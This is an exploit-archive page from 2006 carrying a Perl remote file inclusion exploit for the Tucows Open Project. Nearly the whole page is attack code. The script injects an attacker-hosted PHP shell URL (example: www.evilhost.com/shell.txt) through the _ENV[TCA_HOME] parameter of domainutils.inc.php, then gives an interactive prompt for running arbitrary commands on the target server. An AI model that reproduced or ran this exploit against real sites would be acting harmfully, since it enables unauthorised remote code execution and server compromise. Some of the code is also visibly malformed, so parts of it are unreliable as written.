Home / exploitsPDF  

tucows-rfi.txt

Posted on 09 December 2006

#!/usr/bin/perl #Tucows Open Project --Remote File Inclusion Vulnerablity #Bug Found & Exploit [c]oded By Dr Max Virus #Download:http://developer.tucows.com/code/ccs/downloads/ccs-open-1.2.1015-2006-209-1337.zip use LWP::UserAgent; $target=@ARGV[0]; $shellsite=@ARGV[1]; $cmdv=@ARGV[2]; if($target!~/http:/// || $shellsite!~/http:/// || !$cmdv) { usg() } header(); while() { print "[Shell] $"; while (<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.'/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]='.$shellsite='.?&'.$cmdv.'='.$cmd)or die " Failed to Connect, Try again! "; $res = $xpl->request($req); $info = $res->content; $info =~ tr/[ ]/[&#234;]/; if (!$cmd) { print " Enter a Command "; $info =""; } elsif ($info =~/failed to open stream: HTTP request failed!/ || $info =~/: Cannot execute a blank command in <b>/) { print " Could Not Connect to cmd Host or Invalid Command Variable "; exit; } elsif ($info =~/^<br./>.<b>Warning/) { print " Invalid Command "; }; if($info =~ /(.+)<br./>.<b>Warning.(.+)<br./>.<b>Warning/) { $final = $1; $final=~ tr/[&#234;]/[ ]/; print " $final "; last; } else { print "[shell] $"; } } } last; sub header() { print q{ ******************************************************************************* Tucows open Project -- Remote Include Exploit Vulnerablity found by: Dr Max Virus Exploit [c]oded by: Dr Max Virus ****************************************************************************** } } sub usg() { header(); print q{ Usage: perl exploit.pl [tucows fullpath] [Shell Location] [Shell Cmd] [tucows FULL PATH] - Path to site exp. www.site.com [shell Location] - Path to shell exp. www.evilhost.com/shell.txt [shell Cmd Variable] - Command variable for php shell Example: perl exploit.pl http://www.site.com/[tucows]/ ******************************************************************************** }; exit(); }

 

TOP